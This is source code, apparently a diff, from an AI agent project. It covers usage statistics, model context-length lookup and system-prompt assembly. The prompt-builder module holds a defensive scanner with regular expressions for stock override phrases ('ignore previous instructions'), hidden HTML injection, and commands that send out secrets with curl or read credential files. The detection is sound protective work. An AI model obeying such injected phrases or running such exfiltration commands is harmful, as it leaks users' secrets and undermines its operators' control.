{"tool_name": name, "count": count}
for name, count in tool_counts.most_common()
]
def _get_message_stats(self, cutoff: float, source: str = None) -> Dict:
"""Get aggregate message statistics."""
if source:
cursor = self._conn.execute(
"""SELECT
COUNT(*) as total_messages,
SUM(CASE WHEN m.role = 'user' THEN 1 ELSE 0 END) as user_messages,
SUM(CASE WHEN m.role = 'assistant' THEN 1 ELSE 0 END) as assistant_messages,
SUM(CASE WHEN m.role = 'tool' THEN 1 ELSE 0 END) as tool_messages
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
"""SELECT
COUNT(*) as total_messages,
SUM(CASE WHEN m.role = 'user' THEN 1 ELSE 0 END) as user_messages,
SUM(CASE WHEN m.role = 'assistant' THEN 1 ELSE 0 END) as assistant_messages,
SUM(CASE WHEN m.role = 'tool' THEN 1 ELSE 0 END) as tool_messages
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?""",
(cutoff,),
)
row = cursor.fetchone()
return dict(row) if row else {
"total_messages": 0, "user_messages": 0,
"assistant_messages": 0, "tool_messages": 0,
}
# =========================================================================
# Computation
# =========================================================================
def _compute_overview(self, sessions: List[Dict], message_stats: Dict) -> Dict:
"""Compute high-level overview statistics."""
total_input = sum(s.get("input_tokens") or 0 for s in sessions)
total_output = sum(s.get("output_tokens") or 0 for s in sessions)
total_tokens = total_input + total_output
total_tool_calls = sum(s.get("tool_call_count") or 0 for s in sessions)
total_messages = sum(s.get("message_count") or 0 for s in sessions)
# Cost estimation (weighted by model)
total_cost = 0.0
models_with_pricing = set()
models_without_pricing = set()
for s in sessions:
model = s.get("model") or ""
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
total_cost += _estimate_cost(model, inp, out)
display = model.split("/")[-1] if "/" in model else (model or "unknown")
if _has_known_pricing(model):
models_with_pricing.add(display)
else:
models_without_pricing.add(display)
# Session duration stats (guard against negative durations from clock drift)
durations = []
for s in sessions:
start = s.get("started_at")
end = s.get("ended_at")
if start and end and end > start:
durations.append(end - start)
total_hours = sum(durations) / 3600 if durations else 0
avg_duration = sum(durations) / len(durations) if durations else 0
# Earliest and latest session
started_timestamps = [s["started_at"] for s in sessions if s.get("started_at")]
date_range_start = min(started_timestamps) if started_timestamps else None
date_range_end = max(started_timestamps) if started_timestamps else None
return {
"total_sessions": len(sessions),
"total_messages": total_messages,
"total_tool_calls": total_tool_calls,
"total_input_tokens": total_input,
"total_output_tokens": total_output,
"total_tokens": total_tokens,
"estimated_cost": total_cost,
"total_hours": total_hours,
"avg_session_duration": avg_duration,
"avg_messages_per_session": total_messages / len(sessions) if sessions else 0,
"avg_tokens_per_session": total_tokens / len(sessions) if sessions else 0,
"user_messages": message_stats.get("user_messages") or 0,
"assistant_messages": message_stats.get("assistant_messages") or 0,
"tool_messages": message_stats.get("tool_messages") or 0,
"date_range_start": date_range_start,
"date_range_end": date_range_end,
"models_with_pricing": sorted(models_with_pricing),
"models_without_pricing": sorted(models_without_pricing),
}
def _compute_model_breakdown(self, sessions: List[Dict]) -> List[Dict]:
"""Break down usage by model."""
model_data = defaultdict(lambda: {
"sessions": 0, "input_tokens": 0, "output_tokens": 0,
"total_tokens": 0, "tool_calls": 0, "cost": 0.0,
})
for s in sessions:
model = s.get("model") or "unknown"
# Normalize: strip provider prefix for display
display_model = model.split("/")[-1] if "/" in model else model
d = model_data[display_model]
d["sessions"] += 1
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
d["input_tokens"] += inp
d["output_tokens"] += out
d["total_tokens"] += inp + out
d["tool_calls"] += s.get("tool_call_count") or 0
d["cost"] += _estimate_cost(model, inp, out)
d["has_pricing"] = _has_known_pricing(model)
result = [
{"model": model, **data}
for model, data in model_data.items()
]
# Sort by tokens first, fall back to session count when tokens are 0
result.sort(key=lambda x: (x["total_tokens"], x["sessions"]), reverse=True)
return result
def _compute_platform_breakdown(self, sessions: List[Dict]) -> List[Dict]:
"""Break down usage by platform/source."""
platform_data = defaultdict(lambda: {
"sessions": 0, "messages": 0, "input_tokens": 0,
"output_tokens": 0, "total_tokens": 0, "tool_calls": 0,
})
for s in sessions:
source = s.get("source") or "unknown"
d = platform_data[source]
d["sessions"] += 1
d["messages"] += s.get("message_count") or 0
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
d["input_tokens"] += inp
d["output_tokens"] += out
d["total_tokens"] += inp + out
d["tool_calls"] += s.get("tool_call_count") or 0
result = [
{"platform": platform, **data}
for platform, data in platform_data.items()
]
result.sort(key=lambda x: x["sessions"], reverse=True)
return result
def _compute_tool_breakdown(self, tool_usage: List[Dict]) -> List[Dict]:
"""Process tool usage data into a ranked list with percentages."""
total_calls = sum(t["count"] for t in tool_usage) if tool_usage else 0
result = []
for t in tool_usage:
pct = (t["count"] / total_calls * 100) if total_calls else 0
result.append({
"tool": t["tool_name"],
"count": t["count"],
"percentage": pct,
})
return result
def _compute_activity_patterns(self, sessions: List[Dict]) -> Dict:
"""Analyze activity patterns by day of week and hour."""
day_counts = Counter() # 0=Monday ... 6=Sunday
hour_counts = Counter()
daily_counts = Counter() # date string -> count
for s in sessions:
ts = s.get("started_at")
if not ts:
continue
dt = datetime.fromtimestamp(ts)
day_counts[dt.weekday()] += 1
hour_counts[dt.hour] += 1
daily_counts[dt.strftime("%Y-%m-%d")] += 1
day_names = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
day_breakdown = [
{"day": day_names[i], "count": day_counts.get(i, 0)}
for i in range(7)
]
hour_breakdown = [
{"hour": i, "count": hour_counts.get(i, 0)}
for i in range(24)
]
# Busiest day and hour
busiest_day = max(day_breakdown, key=lambda x: x["count"]) if day_breakdown else None
busiest_hour = max(hour_breakdown, key=lambda x: x["count"]) if hour_breakdown else None
# Active days (days with at least one session)
active_days = len(daily_counts)
# Streak calculation
if daily_counts:
all_dates = sorted(daily_counts.keys())
current_streak = 1
max_streak = 1
for i in range(1, len(all_dates)):
d1 = datetime.strptime(all_dates[i - 1], "%Y-%m-%d")
d2 = datetime.strptime(all_dates[i], "%Y-%m-%d")
if (d2 - d1).days == 1:
current_streak += 1
max_streak = max(max_streak, current_streak)
else:
current_streak = 1
else:
max_streak = 0
return {
"by_day": day_breakdown,
"by_hour": hour_breakdown,
"busiest_day": busiest_day,
"busiest_hour": busiest_hour,
"active_days": active_days,
"max_streak": max_streak,
}
def _compute_top_sessions(self, sessions: List[Dict]) -> List[Dict]:
"""Find notable sessions (longest, most messages, most tokens)."""
top = []
# Longest by duration
sessions_with_duration = [
s for s in sessions
if s.get("started_at") and s.get("ended_at")
]
if sessions_with_duration:
longest = max(
sessions_with_duration,
key=lambda s: (s["ended_at"] - s["started_at"]),
)
dur = longest["ended_at"] - longest["started_at"]
top.append({
"label": "Longest session",
"session_id": longest["id"][:16],
"value": _format_duration(dur),
"date": datetime.fromtimestamp(longest["started_at"]).strftime("%b %d"),
})
# Most messages
most_msgs = max(sessions, key=lambda s: s.get("message_count") or 0)
if (most_msgs.get("message_count") or 0) > 0:
top.append({
"label": "Most messages",
"session_id": most_msgs["id"][:16],
"value": f"{most_msgs['message_count']} msgs",
"date": datetime.fromtimestamp(most_msgs["started_at"]).strftime("%b %d") if most_msgs.get("started_at") else "?",
})
# Most tokens
most_tokens = max(
sessions,
key=lambda s: (s.get("input_tokens") or 0) + (s.get("output_tokens") or 0),
)
token_total = (most_tokens.get("input_tokens") or 0) + (most_tokens.get("output_tokens") or 0)
if token_total > 0:
top.append({
"label": "Most tokens",
"session_id": most_tokens["id"][:16],
"value": f"{token_total:,} tokens",
"date": datetime.fromtimestamp(most_tokens["started_at"]).strftime("%b %d") if most_tokens.get("started_at") else "?",
})
# Most tool calls
most_tools = max(sessions, key=lambda s: s.get("tool_call_count") or 0)
if (most_tools.get("tool_call_count") or 0) > 0:
top.append({
"label": "Most tool calls",
"session_id": most_tools["id"][:16],
"value": f"{most_tools['tool_call_count']} calls",
"date": datetime.fromtimestamp(most_tools["started_at"]).strftime("%b %d") if most_tools.get("started_at") else "?",
})
return top
# =========================================================================
# Formatting
# =========================================================================
def format_terminal(self, report: Dict) -> str:
"""Format the insights report for terminal display (CLI)."""
if report.get("empty"):
days = report.get("days", 30)
src = f" (source: {report['source_filter']})" if report.get("source_filter") else ""
return f" No sessions found in the last {days} days{src}."
lines = []
o = report["overview"]
days = report["days"]
src_filter = report.get("source_filter")
# Header
lines.append("")
lines.append(" ╔══════════════════════════════════════════════════════════╗")
lines.append(" ║ 📊 Hermes Insights ║")
period_label = f"Last {days} days"
if src_filter:
period_label += f" ({src_filter})"
padding = 58 - len(period_label) - 2
left_pad = padding // 2
right_pad = padding - left_pad
lines.append(f"{' ' * left_pad} {period_label} {' ' * right_pad}")
lines.append(" ╚══════════════════════════════════════════════════════════╝")
lines.append("")
# Date range
if o.get("date_range_start") and o.get("date_range_end"):
start_str = datetime.fromtimestamp(o["date_range_start"]).strftime("%b %d, %Y")
end_str = datetime.fromtimestamp(o["date_range_end"]).strftime("%b %d, %Y")
lines.append(f" Period: {start_str}{end_str}")
lines.append("")
# Overview
lines.append(" 📋 Overview")
lines.append(" " + "" * 56)
lines.append(f" Sessions: {o['total_sessions']:<12} Messages: {o['total_messages']:,}")
lines.append(f" Tool calls: {o['total_tool_calls']:<12,} User messages: {o['user_messages']:,}")
lines.append(f" Input tokens: {o['total_input_tokens']:<12,} Output tokens: {o['total_output_tokens']:,}")
cost_str = f"${o['estimated_cost']:.2f}"
if o.get("models_without_pricing"):
cost_str += " *"
lines.append(f" Total tokens: {o['total_tokens']:<12,} Est. cost: {cost_str}")
if o["total_hours"] > 0:
lines.append(f" Active time: ~{_format_duration(o['total_hours'] * 3600):<11} Avg session: ~{_format_duration(o['avg_session_duration'])}")
lines.append(f" Avg msgs/session: {o['avg_messages_per_session']:.1f}")
lines.append("")
# Model breakdown
if report["models"]:
lines.append(" 🤖 Models Used")
lines.append(" " + "" * 56)
lines.append(f" {'Model':<30} {'Sessions':>8} {'Tokens':>12} {'Cost':>8}")
for m in report["models"]:
model_name = m["model"][:28]
if m.get("has_pricing"):
cost_cell = f"${m['cost']:>6.2f}"
else:
cost_cell = " N/A"
lines.append(f" {model_name:<30} {m['sessions']:>8} {m['total_tokens']:>12,} {cost_cell}")
if o.get("models_without_pricing"):
lines.append(f" * Cost N/A for custom/self-hosted models")
lines.append("")
# Platform breakdown
if len(report["platforms"]) > 1 or (report["platforms"] and report["platforms"][0]["platform"] != "cli"):
lines.append(" 📱 Platforms")
lines.append(" " + "" * 56)
lines.append(f" {'Platform':<14} {'Sessions':>8} {'Messages':>10} {'Tokens':>14}")
for p in report["platforms"]:
lines.append(f" {p['platform']:<14} {p['sessions']:>8} {p['messages']:>10,} {p['total_tokens']:>14,}")
lines.append("")
# Tool usage
if report["tools"]:
lines.append(" 🔧 Top Tools")
lines.append(" " + "" * 56)
lines.append(f" {'Tool':<28} {'Calls':>8} {'%':>8}")
for t in report["tools"][:15]: # Top 15
lines.append(f" {t['tool']:<28} {t['count']:>8,} {t['percentage']:>7.1f}%")
if len(report["tools"]) > 15:
lines.append(f" ... and {len(report['tools']) - 15} more tools")
lines.append("")
# Activity patterns
act = report.get("activity", {})
if act.get("by_day"):
lines.append(" 📅 Activity Patterns")
lines.append(" " + "" * 56)
# Day of week chart
day_values = [d["count"] for d in act["by_day"]]
bars = _bar_chart(day_values, max_width=15)
for i, d in enumerate(act["by_day"]):
bar = bars[i]
lines.append(f" {d['day']} {bar:<15} {d['count']}")
lines.append("")
# Peak hours (show top 5 busiest hours)
busy_hours = sorted(act["by_hour"], key=lambda x: x["count"], reverse=True)
busy_hours = [h for h in busy_hours if h["count"] > 0][:5]
if busy_hours:
hour_strs = []
for h in busy_hours:
hr = h["hour"]
ampm = "AM" if hr < 12 else "PM"
display_hr = hr % 12 or 12
hour_strs.append(f"{display_hr}{ampm} ({h['count']})")
lines.append(f" Peak hours: {', '.join(hour_strs)}")
if act.get("active_days"):
lines.append(f" Active days: {act['active_days']}")
if act.get("max_streak") and act["max_streak"] > 1:
lines.append(f" Best streak: {act['max_streak']} consecutive days")
lines.append("")
# Notable sessions
if report.get("top_sessions"):
lines.append(" 🏆 Notable Sessions")
lines.append(" " + "" * 56)
for ts in report["top_sessions"]:
lines.append(f" {ts['label']:<20} {ts['value']:<18} ({ts['date']}, {ts['session_id']})")
lines.append("")
return "\n".join(lines)
def format_gateway(self, report: Dict) -> str:
"""Format the insights report for gateway/messaging (shorter)."""
if report.get("empty"):
days = report.get("days", 30)
return f"No sessions found in the last {days} days."
lines = []
o = report["overview"]
days = report["days"]
lines.append(f"📊 **Hermes Insights** — Last {days} days\n")
# Overview
lines.append(f"**Sessions:** {o['total_sessions']} | **Messages:** {o['total_messages']:,} | **Tool calls:** {o['total_tool_calls']:,}")
lines.append(f"**Tokens:** {o['total_tokens']:,} (in: {o['total_input_tokens']:,} / out: {o['total_output_tokens']:,})")
cost_note = ""
if o.get("models_without_pricing"):
cost_note = " _(excludes custom/self-hosted models)_"
lines.append(f"**Est. cost:** ${o['estimated_cost']:.2f}{cost_note}")
if o["total_hours"] > 0:
lines.append(f"**Active time:** ~{_format_duration(o['total_hours'] * 3600)} | **Avg session:** ~{_format_duration(o['avg_session_duration'])}")
lines.append("")
# Models (top 5)
if report["models"]:
lines.append("**🤖 Models:**")
for m in report["models"][:5]:
cost_str = f"${m['cost']:.2f}" if m.get("has_pricing") else "N/A"
lines.append(f" {m['model'][:25]}{m['sessions']} sessions, {m['total_tokens']:,} tokens, {cost_str}")
lines.append("")
# Platforms (if multi-platform)
if len(report["platforms"]) > 1:
lines.append("**📱 Platforms:**")
for p in report["platforms"]:
lines.append(f" {p['platform']}{p['sessions']} sessions, {p['messages']:,} msgs")
lines.append("")
# Tools (top 8)
if report["tools"]:
lines.append("**🔧 Top Tools:**")
for t in report["tools"][:8]:
lines.append(f" {t['tool']}{t['count']:,} calls ({t['percentage']:.1f}%)")
lines.append("")
# Activity summary
act = report.get("activity", {})
if act.get("busiest_day") and act.get("busiest_hour"):
hr = act["busiest_hour"]["hour"]
ampm = "AM" if hr < 12 else "PM"
display_hr = hr % 12 or 12
lines.append(f"**📅 Busiest:** {act['busiest_day']['day']}s ({act['busiest_day']['count']} sessions), {display_hr}{ampm} ({act['busiest_hour']['count']} sessions)")
if act.get("active_days"):
lines.append(f"**Active days:** {act['active_days']}", )
if act.get("max_streak", 0) > 1:
lines.append(f"**Best streak:** {act['max_streak']} consecutive days")
return "\n".join(lines)

224
agent/model_metadata.py Normal file
View File

@@ -0,0 +1,224 @@
"""Model metadata, context lengths, and token estimation utilities.
Pure utility functions with no AIAgent dependency. Used by ContextCompressor
and run_agent.py for pre-flight context checks.
"""
import logging
import os
import re
import time
from pathlib import Path
from typing import Any, Dict, List, Optional
import requests
import yaml
from hermes_constants import OPENROUTER_MODELS_URL
logger = logging.getLogger(__name__)
_model_metadata_cache: Dict[str, Dict[str, Any]] = {}
_model_metadata_cache_time: float = 0
_MODEL_CACHE_TTL = 3600
# Descending tiers for context length probing when the model is unknown.
# We start high and step down on context-length errors until one works.
CONTEXT_PROBE_TIERS = [
2_000_000,
1_000_000,
512_000,
200_000,
128_000,
64_000,
32_000,
]
DEFAULT_CONTEXT_LENGTHS = {
"anthropic/claude-opus-4": 200000,
"anthropic/claude-opus-4.5": 200000,
"anthropic/claude-opus-4.6": 200000,
"anthropic/claude-sonnet-4": 200000,
"anthropic/claude-sonnet-4-20250514": 200000,
"anthropic/claude-haiku-4.5": 200000,
"openai/gpt-4o": 128000,
"openai/gpt-4-turbo": 128000,
"openai/gpt-4o-mini": 128000,
"google/gemini-2.0-flash": 1048576,
"google/gemini-2.5-pro": 1048576,
"meta-llama/llama-3.3-70b-instruct": 131072,
"deepseek/deepseek-chat-v3": 65536,
"qwen/qwen-2.5-72b-instruct": 32768,
"glm-4.7": 202752,
"glm-5": 202752,
"glm-4.5": 131072,
"glm-4.5-flash": 131072,
"kimi-k2.5": 262144,
"kimi-k2-thinking": 262144,
"kimi-k2-turbo-preview": 262144,
"kimi-k2-0905-preview": 131072,
"MiniMax-M2.5": 204800,
"MiniMax-M2.5-highspeed": 204800,
"MiniMax-M2.1": 204800,
}
def fetch_model_metadata(force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
"""Fetch model metadata from OpenRouter (cached for 1 hour)."""
global _model_metadata_cache, _model_metadata_cache_time
if not force_refresh and _model_metadata_cache and (time.time() - _model_metadata_cache_time) < _MODEL_CACHE_TTL:
return _model_metadata_cache
try:
response = requests.get(OPENROUTER_MODELS_URL, timeout=10)
response.raise_for_status()
data = response.json()
cache = {}
for model in data.get("data", []):
model_id = model.get("id", "")
cache[model_id] = {
"context_length": model.get("context_length", 128000),
"max_completion_tokens": model.get("top_provider", {}).get("max_completion_tokens", 4096),
"name": model.get("name", model_id),
"pricing": model.get("pricing", {}),
}
canonical = model.get("canonical_slug", "")
if canonical and canonical != model_id:
cache[canonical] = cache[model_id]
_model_metadata_cache = cache
_model_metadata_cache_time = time.time()
logger.debug("Fetched metadata for %s models from OpenRouter", len(cache))
return cache
except Exception as e:
logging.warning(f"Failed to fetch model metadata from OpenRouter: {e}")
return _model_metadata_cache or {}
def _get_context_cache_path() -> Path:
"""Return path to the persistent context length cache file."""
hermes_home = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes"))
return hermes_home / "context_length_cache.yaml"
def _load_context_cache() -> Dict[str, int]:
"""Load the model+provider → context_length cache from disk."""
path = _get_context_cache_path()
if not path.exists():
return {}
try:
with open(path) as f:
data = yaml.safe_load(f) or {}
return data.get("context_lengths", {})
except Exception as e:
logger.debug("Failed to load context length cache: %s", e)
return {}
def save_context_length(model: str, base_url: str, length: int) -> None:
"""Persist a discovered context length for a model+provider combo.
Cache key is ``model@base_url`` so the same model name served from
different providers can have different limits.
"""
key = f"{model}@{base_url}"
cache = _load_context_cache()
if cache.get(key) == length:
return # already stored
cache[key] = length
path = _get_context_cache_path()
try:
path.parent.mkdir(parents=True, exist_ok=True)
with open(path, "w") as f:
yaml.dump({"context_lengths": cache}, f, default_flow_style=False)
logger.info("Cached context length %s%s tokens", key, f"{length:,}")
except Exception as e:
logger.debug("Failed to save context length cache: %s", e)
def get_cached_context_length(model: str, base_url: str) -> Optional[int]:
"""Look up a previously discovered context length for model+provider."""
key = f"{model}@{base_url}"
cache = _load_context_cache()
return cache.get(key)
def get_next_probe_tier(current_length: int) -> Optional[int]:
"""Return the next lower probe tier, or None if already at minimum."""
for tier in CONTEXT_PROBE_TIERS:
if tier < current_length:
return tier
return None
def parse_context_limit_from_error(error_msg: str) -> Optional[int]:
"""Try to extract the actual context limit from an API error message.
Many providers include the limit in their error text, e.g.:
- "maximum context length is 32768 tokens"
- "context_length_exceeded: 131072"
- "Maximum context size 32768 exceeded"
- "model's max context length is 65536"
"""
error_lower = error_msg.lower()
# Pattern: look for numbers near context-related keywords
patterns = [
r'(?:max(?:imum)?|limit)\s*(?:context\s*)?(?:length|size|window)?\s*(?:is|of|:)?\s*(\d{4,})',
r'context\s*(?:length|size|window)\s*(?:is|of|:)?\s*(\d{4,})',
r'(\d{4,})\s*(?:token)?\s*(?:context|limit)',
r'>\s*(\d{4,})\s*(?:max|limit|token)', # "250000 tokens > 200000 maximum"
r'(\d{4,})\s*(?:max(?:imum)?)\b', # "200000 maximum"
]
for pattern in patterns:
match = re.search(pattern, error_lower)
if match:
limit = int(match.group(1))
# Sanity check: must be a reasonable context length
if 1024 <= limit <= 10_000_000:
return limit
return None
def get_model_context_length(model: str, base_url: str = "") -> int:
"""Get the context length for a model.
Resolution order:
1. Persistent cache (previously discovered via probing)
2. OpenRouter API metadata
3. Hardcoded DEFAULT_CONTEXT_LENGTHS (fuzzy match)
4. First probe tier (2M) — will be narrowed on first context error
"""
# 1. Check persistent cache (model+provider)
if base_url:
cached = get_cached_context_length(model, base_url)
if cached is not None:
return cached
# 2. OpenRouter API metadata
metadata = fetch_model_metadata()
if model in metadata:
return metadata[model].get("context_length", 128000)
# 3. Hardcoded defaults (fuzzy match)
for default_model, length in DEFAULT_CONTEXT_LENGTHS.items():
if default_model in model or model in default_model:
return length
# 4. Unknown model — start at highest probe tier
return CONTEXT_PROBE_TIERS[0]
def estimate_tokens_rough(text: str) -> int:
"""Rough token estimate (~4 chars/token) for pre-flight checks."""
if not text:
return 0
return len(text) // 4
def estimate_messages_tokens_rough(messages: List[Dict[str, Any]]) -> int:
"""Rough token estimate for a message list (pre-flight only)."""
total_chars = sum(len(str(msg)) for msg in messages)
return total_chars // 4

387
agent/prompt_builder.py Normal file
View File

@@ -0,0 +1,387 @@
"""System prompt assembly -- identity, platform hints, skills index, context files.
All functions are stateless. AIAgent._build_system_prompt() calls these to
assemble pieces, then combines them with memory and ephemeral prompts.
"""
import logging
import os
import re
from pathlib import Path
from typing import Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Context file scanning — detect prompt injection in AGENTS.md, .cursorrules,
# SOUL.md before they get injected into the system prompt.
# ---------------------------------------------------------------------------
_CONTEXT_THREAT_PATTERNS = [
(r'ignore\s+(previous|all|above|prior)\s+instructions', "prompt_injection"),
(r'do\s+not\s+tell\s+the\s+user', "deception_hide"),
(r'system\s+prompt\s+override', "sys_prompt_override"),
(r'disregard\s+(your|all|any)\s+(instructions|rules|guidelines)', "disregard_rules"),
(r'act\s+as\s+(if|though)\s+you\s+(have\s+no|don\'t\s+have)\s+(restrictions|limits|rules)', "bypass_restrictions"),
(r'<!--[^>]*(?:ignore|override|system|secret|hidden)[^>]*-->', "html_comment_injection"),
(r'<\s*div\s+style\s*=\s*["\'].*display\s*:\s*none', "hidden_div"),
(r'translate\s+.*\s+into\s+.*\s+and\s+(execute|run|eval)', "translate_execute"),
(r'curl\s+[^\n]*\$\{?\w*(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API)', "exfil_curl"),
(r'cat\s+[^\n]*(\.env|credentials|\.netrc|\.pgpass)', "read_secrets"),
]
_CONTEXT_INVISIBLE_CHARS = {
'\u200b', '\u200c', '\u200d', '\u2060', '\ufeff',
'\u202a', '\u202b', '\u202c', '\u202d', '\u202e',
}
def _scan_context_content(content: str, filename: str) -> str:
"""Scan context file content for injection. Returns sanitized content."""
findings = []
# Check invisible unicode
for char in _CONTEXT_INVISIBLE_CHARS:
if char in content:
findings.append(f"invisible unicode U+{ord(char):04X}")
# Check threat patterns
for pattern, pid in _CONTEXT_THREAT_PATTERNS:
if re.search(pattern, content, re.IGNORECASE):
findings.append(pid)
if findings:
logger.warning("Context file %s blocked: %s", filename, ", ".join(findings))
return f"[BLOCKED: {filename} contained potential prompt injection ({', '.join(findings)}). Content not loaded.]"
return content
# =========================================================================
# Constants
# =========================================================================
DEFAULT_AGENT_IDENTITY = (
"You are Hermes Agent, an intelligent AI assistant created by Nous Research. "
"You are helpful, knowledgeable, and direct. You assist users with a wide "
"range of tasks including answering questions, writing and editing code, "
"analyzing information, creative work, and executing actions via your tools. "
"You communicate clearly, admit uncertainty when appropriate, and prioritize "
"being genuinely useful over being verbose unless otherwise directed below. "
"Be targeted and efficient in your exploration and investigations."
)
MEMORY_GUIDANCE = (
"You have persistent memory across sessions. Proactively save important things "
"you learn (user preferences, environment details, useful approaches) and do "
"(like a diary!) using the memory tool -- don't wait to be asked."
)
SESSION_SEARCH_GUIDANCE = (
"When the user references something from a past conversation or you suspect "
"relevant prior context exists, use session_search to recall it before asking "
"them to repeat themselves."
)
SKILLS_GUIDANCE = (
"After completing a complex task (5+ tool calls), fixing a tricky error, "
"or discovering a non-trivial workflow, consider saving the approach as a "
"skill with skill_manage so you can reuse it next time."
)
PLATFORM_HINTS = {
"whatsapp": (
"You are on a text messaging communication platform, WhatsApp. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. The file "
"will be sent as a native WhatsApp attachment — images (.jpg, .png, "
".webp) appear as photos, videos (.mp4, .mov) play inline, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"telegram": (
"You are on a text messaging communication platform, Telegram. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio (.ogg) sends as voice "
"bubbles, and videos (.mp4) play inline. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as native photos."
),
"discord": (
"You are in a Discord server or group chat communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are sent as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be sent as attachments."
),
"slack": (
"You are in a Slack workspace communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are uploaded as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be uploaded as attachments."
),
"signal": (
"You are on a text messaging communication platform, Signal. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio as attachments, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"cli": (
"You are a CLI AI Agent. Try not to use markdown but simple text "
"renderable inside a terminal."
),
}
CONTEXT_FILE_MAX_CHARS = 20_000
CONTEXT_TRUNCATE_HEAD_RATIO = 0.7
CONTEXT_TRUNCATE_TAIL_RATIO = 0.2
# =========================================================================
# Skills index
# =========================================================================
def _read_skill_description(skill_file: Path, max_chars: int = 60) -> str:
"""Read the description from a SKILL.md frontmatter, capped at max_chars."""
try:
raw = skill_file.read_text(encoding="utf-8")[:2000]
match = re.search(
r"^---\s*\n.*?description:\s*(.+?)\s*\n.*?^---",
raw, re.MULTILINE | re.DOTALL,
)
if match:
desc = match.group(1).strip().strip("'\"")
if len(desc) > max_chars:
desc = desc[:max_chars - 3] + "..."
return desc
except Exception:
pass
return ""
def _skill_is_platform_compatible(skill_file: Path) -> bool:
"""Quick check if a SKILL.md is compatible with the current OS platform.
Reads just enough to parse the ``platforms`` frontmatter field.
Skills without the field (the vast majority) are always compatible.
"""
try:
from tools.skills_tool import _parse_frontmatter, skill_matches_platform
raw = skill_file.read_text(encoding="utf-8")[:2000]
frontmatter, _ = _parse_frontmatter(raw)
return skill_matches_platform(frontmatter)
except Exception:
return True # Err on the side of showing the skill
def build_skills_system_prompt() -> str:
"""Build a compact skill index for the system prompt.
Scans ~/.hermes/skills/ for SKILL.md files grouped by category.
Includes per-skill descriptions from frontmatter so the model can
match skills by meaning, not just name.
Filters out skills incompatible with the current OS platform.
"""
hermes_home = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
skills_dir = hermes_home / "skills"
if not skills_dir.exists():
return ""
# Collect skills with descriptions, grouped by category
# Each entry: (skill_name, description)
# Supports sub-categories: skills/mlops/training/axolotl/SKILL.md
# → category "mlops/training", skill "axolotl"
skills_by_category: dict[str, list[tuple[str, str]]] = {}
for skill_file in skills_dir.rglob("SKILL.md"):
# Skip skills incompatible with the current OS platform
if not _skill_is_platform_compatible(skill_file):
continue
rel_path = skill_file.relative_to(skills_dir)
parts = rel_path.parts
if len(parts) >= 2:
# Category is everything between skills_dir and the skill folder
# e.g. parts = ("mlops", "training", "axolotl", "SKILL.md")
# → category = "mlops/training", skill_name = "axolotl"
# e.g. parts = ("github", "github-auth", "SKILL.md")
# → category = "github", skill_name = "github-auth"
skill_name = parts[-2]
category = "/".join(parts[:-2]) if len(parts) > 2 else parts[0]
else:
category = "general"
skill_name = skill_file.parent.name
desc = _read_skill_description(skill_file)
skills_by_category.setdefault(category, []).append((skill_name, desc))
if not skills_by_category:
return ""
# Read category-level descriptions from DESCRIPTION.md
# Checks both the exact category path and parent directories
category_descriptions = {}
for category in skills_by_category:
cat_path = Path(category)
desc_file = skills_dir / cat_path / "DESCRIPTION.md"
if desc_file.exists():
try:
content = desc_file.read_text(encoding="utf-8")
match = re.search(r"^---\s*\n.*?description:\s*(.+?)\s*\n.*?^---", content, re.MULTILINE | re.DOTALL)
if match:
category_descriptions[category] = match.group(1).strip()
except Exception as e:
logger.debug("Could not read skill description %s: %s", desc_file, e)
index_lines = []
for category in sorted(skills_by_category.keys()):
cat_desc = category_descriptions.get(category, "")
if cat_desc:
index_lines.append(f" {category}: {cat_desc}")
else:
index_lines.append(f" {category}:")
# Deduplicate and sort skills within each category
seen = set()
for name, desc in sorted(skills_by_category[category], key=lambda x: x[0]):
if name in seen:
continue
seen.add(name)
if desc:
index_lines.append(f" - {name}: {desc}")
else:
index_lines.append(f" - {name}")
return (
"## Skills (mandatory)\n"
"Before replying, scan the skills below. If one clearly matches your task, "
"load it with skill_view(name) and follow its instructions. "
"If a skill has issues, fix it with skill_manage(action='patch').\n"
"\n"
"<available_skills>\n"
+ "\n".join(index_lines) + "\n"
"</available_skills>\n"
"\n"
"If none match, proceed normally without loading a skill."
)
# =========================================================================
# Context files (SOUL.md, AGENTS.md, .cursorrules)
# =========================================================================
def _truncate_content(content: str, filename: str, max_chars: int = CONTEXT_FILE_MAX_CHARS) -> str:
"""Head/tail truncation with a marker in the middle."""
if len(content) <= max_chars:
return content
head_chars = int(max_chars * CONTEXT_TRUNCATE_HEAD_RATIO)
tail_chars = int(max_chars * CONTEXT_TRUNCATE_TAIL_RATIO)
head = content[:head_chars]
tail = content[-tail_chars:]
